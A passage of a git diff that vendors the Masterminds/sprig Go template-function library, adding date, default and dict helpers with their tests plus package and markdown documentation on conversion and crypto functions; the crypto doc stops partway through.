+// Given a format and a date, format the date string.
+//
+// Date can be a `time.Time` or an `int, int32, int64`.
+// In the latter case, it is treated as seconds since UNIX
+// epoch.
+func date(fmt string, date interface{}) string {
+ return dateInZone(fmt, date, "Local")
+}
+
+func htmlDate(date interface{}) string {
+ return dateInZone("2006-01-02", date, "Local")
+}
+
+func htmlDateInZone(date interface{}, zone string) string {
+ return dateInZone("2006-01-02", date, zone)
+}
+
+func dateInZone(fmt string, date interface{}, zone string) string {
+ var t time.Time
+ switch date := date.(type) {
+ default:
+ t = time.Now()
+ case time.Time:
+ t = date
+ case int64:
+ t = time.Unix(date, 0)
+ case int:
+ t = time.Unix(int64(date), 0)
+ case int32:
+ t = time.Unix(int64(date), 0)
+ }
+
+ loc, err := time.LoadLocation(zone)
+ if err != nil {
+ loc, _ = time.LoadLocation("UTC")
+ }
+
+ return t.In(loc).Format(fmt)
+}
+
+func dateModify(fmt string, date time.Time) time.Time {
+ d, err := time.ParseDuration(fmt)
+ if err != nil {
+ return date
+ }
+ return date.Add(d)
+}
+
+func dateAgo(date interface{}) string {
+ var t time.Time
+
+ switch date := date.(type) {
+ default:
+ t = time.Now()
+ case time.Time:
+ t = date
+ case int64:
+ t = time.Unix(date, 0)
+ case int:
+ t = time.Unix(int64(date), 0)
+ }
+ // Drop resolution to seconds
+ duration := time.Since(t).Round(time.Second)
+ return duration.String()
+}
+
+func toDate(fmt, str string) time.Time {
+ t, _ := time.ParseInLocation(fmt, str, time.Local)
+ return t
+}
diff --git a/vendor/github.com/Masterminds/sprig/date_test.go b/vendor/github.com/Masterminds/sprig/date_test.go
new file mode 100644
index 0000000000..b98200dd03
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/date_test.go
@@ -0,0 +1,36 @@
+package sprig
+
+import (
+ "testing"
+ "time"
+)
+
+func TestHtmlDate(t *testing.T) {
+ t.Skip()
+ tpl := `{{ htmlDate 0}}`
+ if err := runt(tpl, "1970-01-01"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestAgo(t *testing.T) {
+ tpl := "{{ ago .Time }}"
+ if err := runtv(tpl, "2m5s", map[string]interface{}{"Time": time.Now().Add(-125 * time.Second)}); err != nil {
+ t.Error(err)
+ }
+
+ if err := runtv(tpl, "2h34m17s", map[string]interface{}{"Time": time.Now().Add(-(2*3600 + 34*60 + 17) * time.Second)}); err != nil {
+ t.Error(err)
+ }
+
+ if err := runtv(tpl, "-5s", map[string]interface{}{"Time": time.Now().Add(5 * time.Second)}); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToDate(t *testing.T) {
+ tpl := `{{toDate "2006-01-02" "2017-12-31" | date "02/01/2006"}}`
+ if err := runt(tpl, "31/12/2017"); err != nil {
+ t.Error(err)
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/defaults.go b/vendor/github.com/Masterminds/sprig/defaults.go
new file mode 100644
index 0000000000..f0161317dc
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/defaults.go
@@ -0,0 +1,84 @@
+package sprig
+
+import (
+ "encoding/json"
+ "reflect"
+)
+
+// dfault checks whether `given` is set, and returns default if not set.
+//
+// This returns `d` if `given` appears not to be set, and `given` otherwise.
+//
+// For numeric types 0 is unset.
+// For strings, maps, arrays, and slices, len() = 0 is considered unset.
+// For bool, false is unset.
+// Structs are never considered unset.
+//
+// For everything else, including pointers, a nil value is unset.
+func dfault(d interface{}, given ...interface{}) interface{} {
+
+ if empty(given) || empty(given[0]) {
+ return d
+ }
+ return given[0]
+}
+
+// empty returns true if the given value has the zero value for its type.
+func empty(given interface{}) bool {
+ g := reflect.ValueOf(given)
+ if !g.IsValid() {
+ return true
+ }
+
+ // Basically adapted from text/template.isTrue
+ switch g.Kind() {
+ default:
+ return g.IsNil()
+ case reflect.Array, reflect.Slice, reflect.Map, reflect.String:
+ return g.Len() == 0
+ case reflect.Bool:
+ return g.Bool() == false
+ case reflect.Complex64, reflect.Complex128:
+ return g.Complex() == 0
+ case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+ return g.Int() == 0
+ case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:
+ return g.Uint() == 0
+ case reflect.Float32, reflect.Float64:
+ return g.Float() == 0
+ case reflect.Struct:
+ return false
+ }
+ return true
+}
+
+// coalesce returns the first non-empty value.
+func coalesce(v ...interface{}) interface{} {
+ for _, val := range v {
+ if !empty(val) {
+ return val
+ }
+ }
+ return nil
+}
+
+// toJson encodes an item into a JSON string
+func toJson(v interface{}) string {
+ output, _ := json.Marshal(v)
+ return string(output)
+}
+
+// toPrettyJson encodes an item into a pretty (indented) JSON string
+func toPrettyJson(v interface{}) string {
+ output, _ := json.MarshalIndent(v, "", " ")
+ return string(output)
+}
+
+// ternary returns the first value if the last value is true, otherwise returns the second value.
+func ternary(vt interface{}, vf interface{}, v bool) interface{} {
+ if v {
+ return vt
+ }
+
+ return vf
+}
diff --git a/vendor/github.com/Masterminds/sprig/defaults_test.go b/vendor/github.com/Masterminds/sprig/defaults_test.go
new file mode 100644
index 0000000000..226d914cbf
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/defaults_test.go
@@ -0,0 +1,129 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestDefault(t *testing.T) {
+ tpl := `{{"" | default "foo"}}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{default "foo" 234}}`
+ if err := runt(tpl, "234"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{default "foo" 2.34}}`
+ if err := runt(tpl, "2.34"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ .Nothing | default "123" }}`
+ if err := runt(tpl, "123"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{ default "123" }}`
+ if err := runt(tpl, "123"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestEmpty(t *testing.T) {
+ tpl := `{{if empty 1}}1{{else}}0{{end}}`
+ if err := runt(tpl, "0"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{if empty 0}}1{{else}}0{{end}}`
+ if err := runt(tpl, "1"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{if empty ""}}1{{else}}0{{end}}`
+ if err := runt(tpl, "1"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{if empty 0.0}}1{{else}}0{{end}}`
+ if err := runt(tpl, "1"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{if empty false}}1{{else}}0{{end}}`
+ if err := runt(tpl, "1"); err != nil {
+ t.Error(err)
+ }
+
+ dict := map[string]interface{}{"top": map[string]interface{}{}}
+ tpl = `{{if empty .top.NoSuchThing}}1{{else}}0{{end}}`
+ if err := runtv(tpl, "1", dict); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{if empty .bottom.NoSuchThing}}1{{else}}0{{end}}`
+ if err := runtv(tpl, "1", dict); err != nil {
+ t.Error(err)
+ }
+}
+func TestCoalesce(t *testing.T) {
+ tests := map[string]string{
+ `{{ coalesce 1 }}`: "1",
+ `{{ coalesce "" 0 nil 2 }}`: "2",
+ `{{ $two := 2 }}{{ coalesce "" 0 nil $two }}`: "2",
+ `{{ $two := 2 }}{{ coalesce "" $two 0 0 0 }}`: "2",
+ `{{ $two := 2 }}{{ coalesce "" $two 3 4 5 }}`: "2",
+ `{{ coalesce }}`: "",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+
+ dict := map[string]interface{}{"top": map[string]interface{}{}}
+ tpl := `{{ coalesce .top.NoSuchThing .bottom .bottom.dollar "airplane"}}`
+ if err := runtv(tpl, "airplane", dict); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToJson(t *testing.T) {
+ dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}}
+
+ tpl := `{{.Top | toJson}}`
+ expected := `{"bool":true,"number":42,"string":"test"}`
+ if err := runtv(tpl, expected, dict); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToPrettyJson(t *testing.T) {
+ dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}}
+ tpl := `{{.Top | toPrettyJson}}`
+ expected := `{
+ "bool": true,
+ "number": 42,
+ "string": "test"
+}`
+ if err := runtv(tpl, expected, dict); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestTernary(t *testing.T) {
+ tpl := `{{true | ternary "foo" "bar"}}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ternary "foo" "bar" true}}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{false | ternary "foo" "bar"}}`
+ if err := runt(tpl, "bar"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ternary "foo" "bar" false}}`
+ if err := runt(tpl, "bar"); err != nil {
+ t.Error(err)
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/dict.go b/vendor/github.com/Masterminds/sprig/dict.go
new file mode 100644
index 0000000000..59076c0182
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/dict.go
@@ -0,0 +1,88 @@
+package sprig
+
+import "github.com/imdario/mergo"
+
+func set(d map[string]interface{}, key string, value interface{}) map[string]interface{} {
+ d[key] = value
+ return d
+}
+
+func unset(d map[string]interface{}, key string) map[string]interface{} {
+ delete(d, key)
+ return d
+}
+
+func hasKey(d map[string]interface{}, key string) bool {
+ _, ok := d[key]
+ return ok
+}
+
+func pluck(key string, d ...map[string]interface{}) []interface{} {
+ res := []interface{}{}
+ for _, dict := range d {
+ if val, ok := dict[key]; ok {
+ res = append(res, val)
+ }
+ }
+ return res
+}
+
+func keys(dicts ...map[string]interface{}) []string {
+ k := []string{}
+ for _, dict := range dicts {
+ for key := range dict {
+ k = append(k, key)
+ }
+ }
+ return k
+}
+
+func pick(dict map[string]interface{}, keys ...string) map[string]interface{} {
+ res := map[string]interface{}{}
+ for _, k := range keys {
+ if v, ok := dict[k]; ok {
+ res[k] = v
+ }
+ }
+ return res
+}
+
+func omit(dict map[string]interface{}, keys ...string) map[string]interface{} {
+ res := map[string]interface{}{}
+
+ omit := make(map[string]bool, len(keys))
+ for _, k := range keys {
+ omit[k] = true
+ }
+
+ for k, v := range dict {
+ if _, ok := omit[k]; !ok {
+ res[k] = v
+ }
+ }
+ return res
+}
+
+func dict(v ...interface{}) map[string]interface{} {
+ dict := map[string]interface{}{}
+ lenv := len(v)
+ for i := 0; i < lenv; i += 2 {
+ key := strval(v[i])
+ if i+1 >= lenv {
+ dict[key] = ""
+ continue
+ }
+ dict[key] = v[i+1]
+ }
+ return dict
+}
+
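+// merge deep-merges the src maps into dst via mergo. Keys already present in
+// dst are preserved; missing keys are filled in from the srcs (see TestMerge).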
+func merge(dst map[string]interface{}, srcs ...map[string]interface{}) interface{} {
+ for _, src := range srcs {
+ if err := mergo.Merge(&dst, src); err != nil {
+ // Swallow errors inside of a template.
+ return ""
+ }
+ }
+ return dst
+}
diff --git a/vendor/github.com/Masterminds/sprig/dict_test.go b/vendor/github.com/Masterminds/sprig/dict_test.go
new file mode 100644
index 0000000000..4ceb40a3db
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/dict_test.go
@@ -0,0 +1,175 @@
+package sprig
+
+import (
+ "strings"
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestDict(t *testing.T) {
+ tpl := `{{$d := dict 1 2 "three" "four" 5}}{{range $k, $v := $d}}{{$k}}{{$v}}{{end}}`
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if len(out) != 12 {
+ t.Errorf("Expected length 12, got %d", len(out))
+ }
+ // dict does not guarantee ordering because it is backed by a map.
+ if !strings.Contains(out, "12") {
+ t.Error("Expected grouping 12")
+ }
+ if !strings.Contains(out, "threefour") {
+ t.Error("Expected grouping threefour")
+ }
+ if !strings.Contains(out, "5") {
+ t.Error("Expected 5")
+ }
+ tpl = `{{$t := dict "I" "shot" "the" "albatross"}}{{$t.the}} {{$t.I}}`
+ if err := runt(tpl, "albatross shot"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestUnset(t *testing.T) {
+ tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+ {{- $_ := unset $d "two" -}}
+ {{- range $k, $v := $d}}{{$k}}{{$v}}{{- end -}}
+ `
+
+ expect := "one1"
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+}
+func TestHasKey(t *testing.T) {
+ tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+ {{- if hasKey $d "one" -}}1{{- end -}}
+ `
+
+ expect := "1"
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestPluck(t *testing.T) {
+ tpl := `
+ {{- $d := dict "one" 1 "two" 222222 -}}
+ {{- $d2 := dict "one" 1 "two" 33333 -}}
+ {{- $d3 := dict "one" 1 -}}
+ {{- $d4 := dict "one" 1 "two" 4444 -}}
+ {{- pluck "two" $d $d2 $d3 $d4 -}}
+ `
+
+ expect := "[222222 33333 4444]"
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestKeys(t *testing.T) {
+ tests := map[string]string{
+ `{{ dict "foo" 1 "bar" 2 | keys | sortAlpha }}`: "[bar foo]",
+ `{{ dict | keys }}`: "[]",
+ `{{ keys (dict "foo" 1) (dict "bar" 2) (dict "bar" 3) | uniq | sortAlpha }}`: "[bar foo]",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+}
+
+func TestPick(t *testing.T) {
+ tests := map[string]string{
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" | len -}}`: "1",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" -}}`: "map[two:222222]",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" | len -}}`: "2",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" "three" | len -}}`: "2",
+ `{{- $d := dict }}{{ pick $d "two" | len -}}`: "0",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+}
+func TestOmit(t *testing.T) {
+ tests := map[string]string{
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" | len -}}`: "1",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" -}}`: "map[two:222222]",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" "two" | len -}}`: "0",
+ `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "two" "three" | len -}}`: "1",
+ `{{- $d := dict }}{{ omit $d "two" | len -}}`: "0",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+}
+
+func TestSet(t *testing.T) {
+ tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+ {{- $_ := set $d "two" 2 -}}
+ {{- $_ := set $d "three" 3 -}}
+ {{- if hasKey $d "one" -}}{{$d.one}}{{- end -}}
+ {{- if hasKey $d "two" -}}{{$d.two}}{{- end -}}
+ {{- if hasKey $d "three" -}}{{$d.three}}{{- end -}}
+ `
+
+ expect := "123"
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestMerge(t *testing.T) {
+ dict := map[string]interface{}{
+ "src2": map[string]interface{}{
+ "h": 10,
+ "i": "i",
+ "j": "j",
+ },
+ "src1": map[string]interface{}{
+ "a": 1,
+ "b": 2,
+ "d": map[string]interface{}{
+ "e": "four",
+ },
+ "g": []int{6, 7},
+ "i": "aye",
+ "j": "jay",
+ },
+ "dst": map[string]interface{}{
+ "a": "one",
+ "c": 3,
+ "d": map[string]interface{}{
+ "f": 5,
+ },
+ "g": []int{8, 9},
+ "i": "eye",
+ },
+ }
+ tpl := `{{merge .dst .src1 .src2}}`
+ _, err := runRaw(tpl, dict)
+ if err != nil {
+ t.Error(err)
+ }
+ expected := map[string]interface{}{
+ "a": "one", // key overridden
+ "b": 2, // merged from src1
+ "c": 3, // merged from dst
+ "d": map[string]interface{}{ // deep merge
+ "e": "four",
+ "f": 5,
+ },
+ "g": []int{8, 9}, // overridden - arrays are not merged
+ "h": 10, // merged from src2
+ "i": "eye", // overridden twice
+ "j": "jay", // overridden and merged
+ }
+ assert.Equal(t, expected, dict["dst"])
+}
diff --git a/vendor/github.com/Masterminds/sprig/doc.go b/vendor/github.com/Masterminds/sprig/doc.go
new file mode 100644
index 0000000000..92ea318c7e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/doc.go
@@ -0,0 +1,233 @@
+/*
+Sprig: Template functions for Go.
+
+This package contains a number of utility functions for working with data
+inside of Go `html/template` and `text/template` files.
+
+To add these functions, use the `template.Funcs()` method:
+
+ t := templates.New("foo").Funcs(sprig.FuncMap())
+
+Note that you should add the function map before you parse any template files.
+
+ In several cases, Sprig reverses the order of arguments from the way they
+ appear in the standard library. This is to make it easier to pipe
+ arguments into functions.
+
+Date Functions
+
+ - date FORMAT TIME: Format a date, where a date is an integer type or a time.Time type, and
+ format is a time.Format formatting string.
+ - dateModify: Given a date, modify it with a duration: `date_modify "-1.5h" now`. If the duration doesn't
+ parse, it returns the time unaltered. See `time.ParseDuration` for info on duration strings.
+ - now: Current time.Time, for feeding into date-related functions.
+ - htmlDate TIME: Format a date for use in the value field of an HTML "date" form element.
+ - dateInZone FORMAT TIME TZ: Like date, but takes three arguments: format, timestamp,
+ timezone.
+ - htmlDateInZone TIME TZ: Like htmlDate, but takes two arguments: timestamp,
+ timezone.
+
+String Functions
+
+ - abbrev: Truncate a string with ellipses. `abbrev 5 "hello world"` yields "he..."
+ - abbrevboth: Abbreviate from both sides, yielding "...lo wo..."
+ - trunc: Truncate a string (no suffix). `trunc 5 "Hello World"` yields "hello".
+ - trim: strings.TrimSpace
+ - trimAll: strings.Trim, but with the argument order reversed `trimAll "$" "$5.00"` or `"$5.00" | trimAll "$"`
+ - trimSuffix: strings.TrimSuffix, but with the argument order reversed: `trimSuffix "-" "ends-with-"`
+ - trimPrefix: strings.TrimPrefix, but with the argument order reversed `trimPrefix "$" "$5"`
+ - upper: strings.ToUpper
+ - lower: strings.ToLower
+ - nospace: Remove all space characters from a string. `nospace "h e l l o"` becomes "hello"
+ - title: strings.Title
+ - untitle: Remove title casing
+ - repeat: strings.Repeat, but with the arguments switched: `repeat count str`. (This simplifies common pipelines)
+ - substr: Given string, start, and length, return a substr.
+ - initials: Given a multi-word string, return the initials. `initials "Matt Butcher"` returns "MB"
+ - randAlphaNum: Given a length, generate a random alphanumeric sequence
+ - randAlpha: Given a length, generate an alphabetic string
+ - randAscii: Given a length, generate a random ASCII string (symbols included)
+ - randNumeric: Given a length, generate a string of digits.
+ - swapcase: SwapCase swaps the case of a string using a word based algorithm. see https://godoc.org/github.com/Masterminds/goutils#SwapCase
+ - shuffle: Shuffle randomizes runes in a string and returns the result. It uses default random source in `math/rand`
+ - snakecase: convert a camelCase string to snake_case format.
+ - camelcase: convert a snake_case string to CamelCase format.
+ - wrap: Force a line wrap at the given width. `wrap 80 "imagine a longer string"`
+ - wrapWith: Wrap a line at the given length, but using 'sep' instead of a newline. `wrapWith 50, "<br>", $html`
+ - contains: strings.Contains, but with the arguments switched: `contains substr str`. (This simplifies common pipelines)
+ - hasPrefix: strings.hasPrefix, but with the arguments switched
+ - hasSuffix: strings.hasSuffix, but with the arguments switched
+ - quote: Wrap string(s) in double quotation marks, escape the contents by adding '\' before '"'.
+ - squote: Wrap string(s) in single quotation marks, does not escape content.
+ - cat: Concatenate strings, separating them by spaces. `cat $a $b $c`.
+ - indent: Indent a string using space characters. `indent 4 "foo\nbar"` produces " foo\n bar"
+ - nindent: Indent a string using space characters and prepend a new line. `nindent 4 "foo\nbar"` produces "\n foo\n bar"
+ - replace: Replace an old with a new in a string: `$name | replace " " "-"`
+ - plural: Choose singular or plural based on length: `len $fish | plural "one anchovy" "many anchovies"`
+ - sha256sum: Generate a hex encoded sha256 hash of the input
+ - toString: Convert something to a string
+
+String Slice Functions:
+
+ - join: strings.Join, but as `join SEP SLICE`
+ - split: strings.Split, but as `split SEP STRING`. The results are returned
+ as a map with the indexes set to _N, where N is an integer starting from 0.
+ Use it like this: `{{$v := "foo/bar/baz" | split "/"}}{{$v._0}}` (Prints `foo`)
+ - splitList: strings.Split, but as `splitList SEP STRING`. The results are returned
+ as an array.
+ - toStrings: convert a list to a list of strings. 'list 1 2 3 | toStrings' produces '["1" "2" "3"]'
+ - sortAlpha: sort a list lexicographically.
+
+Integer Slice Functions:
+
+ - until: Given an integer, returns a slice of counting integers from 0 to one
+ less than the given integer: `range $i, $e := until 5`
+ - untilStep: Given start, stop, and step, return an integer slice starting at
+   'start', stopping at `stop`, and incrementing by 'step'. This is the same
+ as Python's long-form of 'range'.
+
+Conversions:
+
+ - atoi: Convert a string to an integer. 0 if the integer could not be parsed.
+ - int64: Convert a string or another numeric type to an int64.
+ - int: Convert a string or another numeric type to an int.
+ - float64: Convert a string or another numeric type to a float64.
+
+Defaults:
+
+ - default: Give a default value. Used like this: trim " " | default "empty".
+ Since trim produces an empty string, the default value is returned. For
+ things with a length (strings, slices, maps), len(0) will trigger the default.
+ For numbers, the value 0 will trigger the default. For booleans, false will
+ trigger the default. For structs, the default is never returned (there is
+ no clear empty condition). For everything else, nil value triggers a default.
+ - empty: Return true if the given value is the zero value for its type.
+ Caveats: structs are always non-empty. This should match the behavior of
+ {{if pipeline}}, but can be used inside of a pipeline.
+ - coalesce: Given a list of items, return the first non-empty one.
+   This follows the same rules as 'empty'. '{{ coalesce .someVal 0 "hello" }}'
+ will return `.someVal` if set, or else return "hello". The 0 is skipped
+ because it is an empty value.
+ - compact: Return a copy of a list with all of the empty values removed.
+ 'list 0 1 2 "" | compact' will return '[1 2]'
+ - ternary: Given a value, 'true | ternary "b" "c"' will return "b".
+ 'false | ternary "b" "c"' will return '"c"'. Similar to the JavaScript ternary
+ operator.
+
+OS:
+ - env: Resolve an environment variable
+ - expandenv: Expand a string through the environment
+
+File Paths:
+ - base: Return the last element of a path. https://golang.org/pkg/path#Base
+ - dir: Remove the last element of a path. https://golang.org/pkg/path#Dir
+ - clean: Clean a path to the shortest equivalent name. (e.g. remove "foo/.."
+ from "foo/../bar.html") https://golang.org/pkg/path#Clean
+ - ext: https://golang.org/pkg/path#Ext
+ - isAbs: https://golang.org/pkg/path#IsAbs
+
+Encoding:
+ - b64enc: Base 64 encode a string.
+ - b64dec: Base 64 decode a string.
+
+Reflection:
+
+ - typeOf: Takes an interface and returns a string representation of the type.
+ For pointers, this will return a type prefixed with an asterisk(`*`). So
+ a pointer to type `Foo` will be `*Foo`.
+ - typeIs: Compares an interface with a string name, and returns true if they match.
+ Note that a pointer will not match a reference. For example `*Foo` will not
+ match `Foo`.
+ - typeIsLike: Compares an interface with a string name and returns true if
+ the interface is that `name` or that `*name`. In other words, if the given
+ value matches the given type or is a pointer to the given type, this returns
+ true.
+ - kindOf: Takes an interface and returns a string representation of its kind.
+ - kindIs: Returns true if the given string matches the kind of the given interface.
+
+ Note: None of these can test whether or not something implements a given
+ interface, since doing so would require compiling the interface in ahead of
+ time.
+
+Data Structures:
+
+ - tuple: Takes an arbitrary list of items and returns a slice of items. Its
+ tuple-ish properties are mainly gained through the template idiom, and not
+ through an API provided here. WARNING: The implementation of tuple will
+ change in the future.
+ - list: An arbitrary ordered list of items. (This is preferred over tuple.)
+ - dict: Takes a list of name/values and returns a map[string]interface{}.
+ The first parameter is converted to a string and stored as a key, the
+ second parameter is treated as the value. And so on, with odds as keys and
+ evens as values. If the function call ends with an odd, the last key will
+ be assigned the empty string. Non-string keys are converted to strings as
+ follows: []byte are converted, fmt.Stringers will have String() called.
+ errors will have Error() called. All others will be passed through
+ fmt.Sprintf("%v").
+
+Lists Functions:
+
+These are used to manipulate lists: '{{ list 1 2 3 | reverse | first }}'
+
+ - first: Get the first item in a 'list'. 'list 1 2 3 | first' prints '1'
+ - last: Get the last item in a 'list': 'list 1 2 3 | last ' prints '3'
+ - rest: Get all but the first item in a list: 'list 1 2 3 | rest' returns '[2 3]'
+ - initial: Get all but the last item in a list: 'list 1 2 3 | initial' returns '[1 2]'
+ - append: Add an item to the end of a list: 'append $list 4' adds '4' to the end of '$list'
+ - prepend: Add an item to the beginning of a list: 'prepend $list 4' puts 4 at the beginning of the list.
+ - reverse: Reverse the items in a list.
+ - uniq: Remove duplicates from a list.
+ - without: Return a list with the given values removed: 'without (list 1 2 3) 1' would return '[2 3]'
+ - has: Return 'true' if the item is found in the list: 'has "foo" $list' will return 'true' if the list contains "foo"
+
+Dict Functions:
+
+These are used to manipulate dicts.
+
+ - set: Takes a dict, a key, and a value, and sets that key/value pair in
+ the dict. `set $dict $key $value`. For convenience, it returns the dict,
+ even though the dict was modified in place.
+ - unset: Takes a dict and a key, and deletes that key/value pair from the
+ dict. `unset $dict $key`. This returns the dict for convenience.
+ - hasKey: Takes a dict and a key, and returns boolean true if the key is in
+ the dict.
+ - pluck: Given a key and one or more maps, get all of the values for that key.
+ - keys: Get an array of all of the keys in one or more dicts.
+ - pick: Select just the given keys out of the dict, and return a new dict.
+ - omit: Return a dict without the given keys.
+
+Math Functions:
+
+Integer functions will convert integers of any width to `int64`. If a
+string is passed in, functions will attempt to convert with
+`strconv.ParseInt(s, 10, 64)`. If this fails, the value will be treated as 0.
+
+ - add1: Increment an integer by 1
+ - add: Sum an arbitrary number of integers
+ - sub: Subtract the second integer from the first
+ - div: Divide the first integer by the second
+ - mod: Modulo of first integer divided by second
+ - mul: Multiply integers
+ - max: Return the biggest of a series of one or more integers
+ - min: Return the smallest of a series of one or more integers
+ - biggest: DEPRECATED. Return the biggest of a series of one or more integers
+
+Crypto Functions:
+
+ - genPrivateKey: Generate a private key for the given cryptosystem. If no
+ argument is supplied, by default it will generate a private key using
+ the RSA algorithm. Accepted values are `rsa`, `dsa`, and `ecdsa`.
+ - derivePassword: Derive a password from the given parameters according to the ["Master Password" algorithm](http://masterpasswordapp.com/algorithm.html)
+ Given parameters (in order) are:
+ `counter` (starting with 1), `password_type` (maximum, long, medium, short, basic, or pin), `password`,
+ `user`, and `site`
+
+SemVer Functions:
+
+These functions provide version parsing and comparisons for SemVer 2 version
+strings.
+
+ - semver: Parse a semantic version and return a Version object.
+ - semverCompare: Compare a SemVer range to a particular version.
+*/
+package sprig
diff --git a/vendor/github.com/Masterminds/sprig/docs/_config.yml b/vendor/github.com/Masterminds/sprig/docs/_config.yml
new file mode 100644
index 0000000000..c741881743
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/_config.yml
@@ -0,0 +1 @@
+theme: jekyll-theme-slate
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/docs/conversion.md b/vendor/github.com/Masterminds/sprig/docs/conversion.md
new file mode 100644
index 0000000000..06f4f77680
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/conversion.md
@@ -0,0 +1,25 @@
+# Type Conversion Functions
+
+The following type conversion functions are provided by Sprig:
+
+- `atoi`: Convert a string to an integer
+- `float64`: Convert to a float64
+- `int`: Convert to an `int` at the system's width.
+- `int64`: Convert to an `int64`
+- `toString`: Convert to a string
+- `toStrings`: Convert a list, slice, or array to a list of strings.
+
+Only `atoi` requires that the input be a specific type. The others will attempt
+to convert from any type to the destination type. For example, `int64` can convert
+floats to ints, and it can also convert strings to ints.
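+
+For example, each of the following yields the number 42 (the first as an
+`int`, the second as an `int64`):
+
+```
+atoi "42"
+int64 "42"
+```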
+
+## toStrings
+
+Given a list-like collection, produce a slice of strings.
+
+```
+list 1 2 3 | toStrings
+```
+
+The above converts `1` to `"1"`, `2` to `"2"`, and so on, and then returns
+them as a list.
diff --git a/vendor/github.com/Masterminds/sprig/docs/crypto.md b/vendor/github.com/Masterminds/sprig/docs/crypto.md
new file mode 100644
index 0000000000..a927a45b78
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/crypto.md
@@ -0,0 +1,133 @@
+# Cryptographic and Security Functions
+
+Sprig provides a couple of advanced cryptographic functions.
+
+## sha1sum
+
+The `sha1sum` function receives a string, and computes its SHA1 digest.
+
+```
+sha1sum "Hello world!"
+```
+
+## sha256sum
+
+The `sha256sum` function receives a string, and computes its SHA256 digest.
+
+```
+sha256sum "Hello world!"
+```
+
+The above will compute the SHA 256 sum in an "ASCII armored" format that is
+safe to print.
+
+## derivePassword
+
+The `derivePassword` function can be used to derive a specific password based on
+some shared "master password" constraints. The algorithm for this is
+[well specified](http://masterpasswordapp.com/algorithm.html).
+
+```
+derivePassword 1 "long" "password" "user" "example.com"
+```
+
+Note that it is considered insecure to store the parts directly in the template.
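+
+The parameters are, in order: `counter` (starting with 1), `password_type`
+(one of `maximum`, `long`, `medium`, `short`, `basic`, or `pin`), `password`,
+`user`, and `site`.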
+
+## genPrivateKey
+
+The `genPrivateKey` function generates a new private key encoded into a PEM
+block.
+
+It takes one of the values for its first param:
+
+- `ecdsa`: Generate an elliptic curve DSA key (P256)
+- `dsa`: Generate a DSA key (L2048N256)
+- `rsa`: Generate an RSA 4096 key
+
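+For example, to generate an RSA key and base64-encode the resulting PEM block
+(as exercised in the library's tests):
+
+```
+genPrivateKey "rsa" | b64enc
+```
+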
+## buildCustomCert
+
+The `buildCustomCert` function allows customizing the certificate.
+
+It takes the following string parameters:
+
+- A base64 encoded PEM format certificate
+- A base64 encoded PEM format private key
+
+It returns a certificate object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
